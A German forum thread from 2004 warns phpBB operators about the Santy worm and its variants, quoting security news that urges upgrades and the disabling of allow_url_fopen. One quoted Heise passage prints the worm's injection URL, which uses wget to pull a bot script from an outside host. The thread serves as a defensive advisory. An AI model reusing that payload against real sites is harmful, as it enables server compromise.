Warnung: PHPBB-Wurm zerlegt FOREN!

Einklappen
X
Einklappen
 
  • Seite von 1
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge
Vorherige template Weiter
  • niemandsland
    N/A
    • 17.08.2003
    • 1679
    #1

    Warnung: PHPBB-Wurm zerlegt FOREN!

    Ein neuer Wurm nutzt eine Sicherheitslücke in PHPBB v1.10 und älter, und zerstört die Datenbank. Die Seite PHPBB2.DE rät, möglichst schnell auf Version v1.11 upzudaten.

    Mehr Informationen zu diesem Thema:

    Zitat von [b]News auf PHPBB2[/b]
    Today a lot of Webservers have been hacked by a so called "Net-Worm.Perl.Santy.a". This worm infects certain web sites by exploiting a vulnerability in phpBB. Santy.a is spreading rapidly, and has caused an epidemic. Santy.a is something of a novelty - it creates a specially formulated Google search request, which results in a list of sites running vulnerable versions of phpBB. It then sends a request containing a procedure which will trigger the vulnerability to these sites. Once the attacked server processes the request, the worm will penetrate the site, gaining control over the resource. It then repeats this routine. Once the worm has gained control over a site, it will scan all directories on the infected site. All files with the extensions .htm, .php, .asp, .shtm, .jsp and phtm will be overwritten with the text 'This site is defaced!!! This site is defaced!!! NeverEverNoSanity WebWorm generation'. Apart from defacing infected sites with this text, the worm has no pay load. It will not infect machines which are used to view infected sites. We recommend that all users of phpBB should upgrade to version 2.0.11 to prevent their sites from being defaced.

    Once again a urgent upgrade reminder !!! Upgrade your phpBB2 Version to the latest 2.0.11 or your Forum will be hacked and destroyed !!!

    Details can be found here:

    Press Releases & News | Kaspersky | Kaspersky
    http://www.kaspersky.com/news?id=156681162
    Keep up-to-date with the latest Kaspersky news, press releases, and access media resources.

    http://www.f-secure.com/weblog/
    International sind bereits via Google mehr als 370.000 Homepages bzw. deren Foren betroffen.

    In der vergangenen Nacht sind allein in Deutschland ca. 3000 neue Systeme dazu gekommen. Aktuelle Zahlen liefert google!

    Suche:

    Internationale Suche auf google nach dem Wurm!
    Deutsche Seiten in der google-DB

    -- News dazu auf Heise --

    Software für Diskussionsforen verrät Hashes von Passwörtern [Update]
    Mehrere deutsche Web-Auftritte gehackt [2. Update]
    Weitere Verbreitung des Santy-Wurms gestoppt

    -NL-
    Stichworte: -
    • Matthias45
      Heerführer


      • 28.10.2004
      • 4300
      • Damme, Niedersachsen
      • MD3009, Der Schrottfinder..
      #2
      re: warnung...

      wenn diese viren, trojaner und würmer-programmierer ihr geistiges potential für was brauchbares einsetzen würden dann hätten alle weniger stress und die könnten damit vielleicht sogar noch kohle verdienen..
      Glück Auf!
      Matthias

        Kommentar

        • niemandsland
          N/A
          • 17.08.2003
          • 1679
          #3
          Wie Heise Security bereits Heiligabend und am 1. Weihnachtsfeiertag mitgeteilt hat, ist eine neue Variante von "Santy" aufgetaucht!

          Hier der Text:
          Zitat von Heise Security
          Neue Version des Santy-Wurms sucht bei Yahoo

          Eine neue Version des Santy-Wurms sucht jetzt bei Yahoo nach verwundbaren phpBB-Systemen. Bereits am 21.12. hatte der Santy-Wurm durch gezielte Suche bei Google mehr als 40.000 verwundbare Web-Sites aufgespürt und verunstaltet, darunter die Seiten von Softmaker, Men's Health, des Zoos München und der Zeitschrift Connect. Daraufhin hat Google die weitere Ausbreitung gestoppt, indem man die Suchanfragen des Wurms ausfilterte.

          Heute erreichte heise Security ein erstes Sample, das die Suche von Yahoo nutzt, um weitere Opfer zu finden. Ein Schweizer Web-Hoster fand dieses Exemplar im /tmp-Verzeichnis eines Kunden, von wo aus es versuchte, andere Sites zu infizieren. Ob diese Wurmversion sich tatsächlich nennenswert verbreitet, ist bisher unklar. Trotzdem sollten alle Betreiber von phpBB-Systemen schnellstmöglich auf die Version 2.0.11 umstellen oder zumindest den im phpBB-Forum beschriebenen Workaround einsetzen. Denn weiter optimierte Versionen des im Quelltext verfügbaren Santy-Wurms kommen bestimmt. (ju/c't) [/b]
          Und weiter heißt es:

          Hier der Text:
          Zitat von Heise Security
          Wurm attackiert PHP-Skripte [Update]

          Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700 Zombies angemeldet sind, die der Wurm kontrolliert. Über spezielle Kommandos können diese Zombies unter anderem Port-Scans und verteilte DoS-Angriffe durchführen.

          Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:

          http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;\
          wget www.visualcoders.net/spybot.txt;

          Überprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.

          heise Security hat bereits versucht, die Administratoren der für diesen Zweck missbrauchten Site www.visualcoders.net zu benachrichtigen, aber bisher keine Antwort erhalten.

          Update:
          Der Hoster der missbrauchten Site hat aufgrund der Benachrichtigung durch heise Security die Skripte entfernt. Das Problem ist jedoch längst nicht beseitigt. Denn mittlerweile sind weitere Varianten des Wurms aktiv, die Code von anderen Sites nachladen. Die neuen Varianten nutzen teilweise auch andere Suchmaschinen, um PHP-Skripte aufzuspüren.

          Der Wurm nutzt einen weit verbreiteten Programmierfehler, der dazu führt, dass ein Angreifer Dateien mit PHP-Code nachladen und ausführen können. Das Problem ist als "File Inclusion Vulnerability" bekannt und betrifft viele PHP-Skripte, die inlude- oder require-Befehle mit nicht ausreichend geprüften Variablen einsetzen. Wer Zugriff auf die Konfiguration des Web-Servers hat, kann sich durch Abschalten der Option allow_url_fopen in der Konfigurationsdatei php.ini gegen solche Attacken schützen. Das beschränkt den Zugriff von PHP auf lokale Dateien. Es bleibt allerdings das Risiko, dass beispielsweise lokale Dateien ausgespäht werden. Deshalb ist es grundsätzlich erforderlich, alle Variablen, die extern gesetzt werden, sorgfältig zu prüfen.

          Siehe dazu auch:

          Bericht auf Full Disclosure

          (ju/c't)
          Quelle(n):
          Meldung vom 24.12.2004 zu "Santy" + Yahoo!
          Neue Version des Santy-Wurms sucht bei Yahoo
          http://www.heise.de/newsticker/meldung/54612
          Eine neue Santy-Version sucht jetzt bei Yahoo nach verwundbaren phpBB-Systemen; bereits am 21.12. hatte der Wurm durch gezielte Suche bei Google mehr als 40.000 verwundbare Web-Sites aufgespürt und verunstaltet.


          Meldung vom 25.12.2004 zu "Santy" + Yahoo! (update)
          Wurm attackiert PHP-Skripte [Update]
          http://www.heise.de/newsticker/meldung/54623
          Die bereits gestern gemeldete Santy-Version attackiert systematisch PHP-Skripte. Unter anderem verbindet sich der Wurm bei Erfolg mit einem IRC-Server und nimmt dort Befehle entgegen.



          -NL-

            Kommentar

            Vorherige template Weiter
            Lädt...